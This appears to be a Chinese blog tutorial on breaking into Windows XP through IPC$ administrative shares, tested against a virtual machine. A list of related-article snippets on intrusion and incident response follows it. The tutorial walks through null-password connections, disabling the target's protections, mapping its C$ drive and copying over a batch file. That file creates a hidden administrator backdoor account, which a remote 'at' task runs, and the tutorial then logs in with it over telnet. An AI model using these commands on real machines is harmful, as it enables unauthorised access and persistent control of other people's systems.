利用IPC$共享入侵windowsXP实战

测试环境:主机(windows XP sp3)与windows XP 虚拟机)
   通过IPC$与windowsXP建立连接,在现在的绝大多数的XP操作系统中总是会出现问题。以下如何解决在建立IPC$出现的一系列问题。IPC$(Internet process connection),通常很多的机子的默认共享都是打开的!在cmd下使用net share命令是不是发现有很多$,“ipc$ admin$ ,c$ ,d$.....”(很危险啊)。
现在进入正题:

1.net use \\目标IP\ipc$

出现53错误:找不到网络路径,(目标主机打开了系统防火墙或者其他防火墙软件,解决:关闭目标防火墙)
出现1326错误:

1)net use \\目标IP\ipc$ "" /user:"administrator"进行连接,报告系统发生1326错误,登陆失败:未知用户名或密码错误。检查一下我们的命令是否错误或者用户名错误。结果发现无错。

2)在远程机的"控制面板-文件夹选项-查看-简单的文件共享",去掉选取,然后再尝试连接。简单文件共享会
把网络连接权限都归为 guest连接,是无法访问IPC$等管理共享的.结果发现这个错误,纠正。

紧接着可能出现1327错误:登陆失败:用户帐户限制。可能的原因包括不允许空密码,登陆时间限制,或强制的策略限。"在远程机的"控制面板-管理工具-本地安全策略-安全选项-用户权限"指派里,禁用"空密码用户只能进行控制台登陆".

映射对方默认共享c盘:net use z: \\目标IP\c$

在我的电脑中会出现网络驱动器

建立ipc$告一段落,删除ipc$连接:net sue \\目标IP\ipc$ /del

在此基础上在目标电脑上留下后门账号:
编写一个批处理文件,并拷贝到对方的电脑上,然后增加计划任务执行批处理文件;
批处理命令:(保存为adduser.bat)
net user nebulastest 123456 /add //增加用户nebulastest,密码123456
net localgroup administrators nebulastest /add //为用户nebulastest赋予管理员权限

然后在本机上执行命令(已经建立IPC$连接):copy adduser.bat \\目标IP\c$
接着查看目标电脑时间:net time \\目标IP
随后为目标电脑增加计划任务:at \\目标IP 执行时间 c:\adduser.bat

删除当前IPC$链接,使用新用户和新密码建立IPC$链接,以测试时候建立账号成功。
net use \\目标IP\ipc$ "123456" /user:"nebulastest"


使用telnet进行登陆
:(前提:目标电脑已经开启telnet服务)

双击“telnet服务”-----选择“自动”-----点击“启动”

在命令行输入:telnet 目标IP
之后弹出远程登录对话框,选择Y,输入用户名(后门账户,密码)
输入密码不会现在但是回车后会自动验证是否密码正确

下图已经输入密码但是不会显示:

登陆后的界面:

时间: 2024-11-05 22:05:57

利用IPC$共享入侵windowsXP实战的相关文章

linux系统被入侵后处理实战

Linux系统被入侵后处理实战 事件背景: 操作系统:centos6.5 运行业务:公司业务系统,爬虫程序,数据队列 服务器托管在外地机房 事件起因: 突然频繁收到一组服务器ping监控不可达邮件,通过zabbix监控系统中,发现流量超高,达到了800M,发现不正常,马上尝试ssh登录系统,不幸的是,这种情况是很难登录系统的. 处理过程: 当时第一反应是想马上切断外部网络,通过内网连接查看 可是这样一来流量就会消失,也就很难查找攻击源了,于是联系机房协助解决,授权机房技术登录到系统: 1.检测系

Metasploit漏洞利用,三个入侵主机实战案例

受害者主机 windows2003 ie模拟工具ietest ie5.5/6/7/ 漏洞:MS10_002,MS10_018,MS12-020 -------------------------------------------------------------------------------------------- 开启数据库,查看漏洞 设置监听者ip 设置监听载荷 设置端口 设置路径,可默认 设置监听地址 设置监听端口号 受害者访问ip 返回监听结果 查看结果 漏洞利用 成功拿到s

通过NSA黑客工具永恒之蓝利用SMB共享传播蠕虫病毒的通告

关于防范基于SMB文件共享传播的蠕虫病毒攻击 紧急安全预警通告        2017年05月12日   第1章  安全通告 各位: 2017年5月12日起,在国内外网络中发现爆发基于Windows网络共享协议进行攻击传播的蠕虫恶意代码,这是不法分子通过改造之前泄露的NSA黑客武器库中"永恒之蓝"攻击程序发起的网络攻击事件. 目前发现的蠕虫会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入执行勒索程序.远程控制木马.虚拟货

【未知攻焉知防】如何利用旁注渗透入侵服务器站点

1. 概述 此文原出自[爱运维社区]: http://www.easysb.cn 旁注(旁站,其实是同一个意思),顾名思义,就是从旁边的站点注入,是渗透入侵常用的一种手段.通常,一台服务器上有很多个站点,这些站点之间没有必然的联系,是相互独立的,使用的是不同的域名(甚至端口都不同),但是它们却共存在一台服务器上. 如果我们要对某一个站点进行直接渗透无法突破时,那么我们可以对同服务器的其他站点进行渗透,只要能打破一个缺口,就能沦陷服务区上的整个站点,甚至是一个集群. 我们这次以实际的一个站点为例,

利用nfs共享实现多台web服务器的负载均衡(转载,没实现过)

一.实验目的 本实验主要通过nfs解决多台web服务器负载均衡的问题和数据同步的问题. 二.实验环境: 如上拓扑图所示,在server1上安装有mysql数据库,server2和server3通过nfs共享server1上的mysql数据库,同时,将discuz网站的源码放在server1上,即:server1只运行mysql,而server2和server3只运行php和apache.这样可以保证用户不管访问server2或者server3都可以得到相同的结果. 三.实验步骤 1.server

利用html5 共享地理位置

该例子是演示利用HTML5实现地理定位.也就是获得本机IP地址,然后判断出所在位置,并且显示在Google地图上.. 实例效果图 该实例预览地址:http://html5demos.com/geo XML/HTML Code复制内容到剪贴板 <!DOCTYPE html> <html lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv

两台Ubuntu计算机利用Synergy共享鼠标和键盘

工作时使用多台计算机的话,如果要为它们都接上鼠标.键盘可能是一件麻烦的事情:占用很多位置,而且没必要.本文介绍了如何使用Synergy程序在两台Ubuntu计算机之间共享鼠标和键盘的方法.通过此方法,你可以在鼠标移动到一个屏幕的边缘之后,自动"跳入"另一个屏幕中,并且鼠标定位在哪个屏幕中,键盘就可以在哪个屏幕中进行文字输入. 『1』安装 两台Ubuntu均需要安装: sudo apt-get install synergy sudo apt-get install quicksyner

【转】VC 利用DLL共享区间在进程间共享数据及进程间广播消息

1.http://blog.csdn.net/morewindows/article/details/6702342 在进程间共享数据有很多种方法,剪贴板,映射文件等都可以实现,这里介绍用DLL的共享区间在进程间共享数据,及共享数据有变化时及时的反馈给各相关进程. 一.在DLL中设置共享区间 在DLL中是用数据段来实现共享区间的,有了这个共享区间,各进程可以方便的共享数据. 1.先用#pragma data_seg(Name)设置名为Name的数据段. 2.再用#pragma comment(l

利用 samba 共享和 nfs 共享目录的实现;

(1) 使用samba和NFS分别共享/data目录: (2) 让samba客户端和NFS客户端分别挂载samba服务器上共享的/data/至本地的/mydata目录:本地的mysqld或mariadb服务的数据目录设置为/mydata,要求服务能正常启动,且可正常存储数据: 首先,我们需要关闭selinux和防火墙: 1.NFS共享实现: 首先在7.4A主机上安装并启动nfs,然后在/etc/exports配置文件中添加一行,需要的共享目录,和应当的权限: 在另一台主机上挂载nfs文件系统并安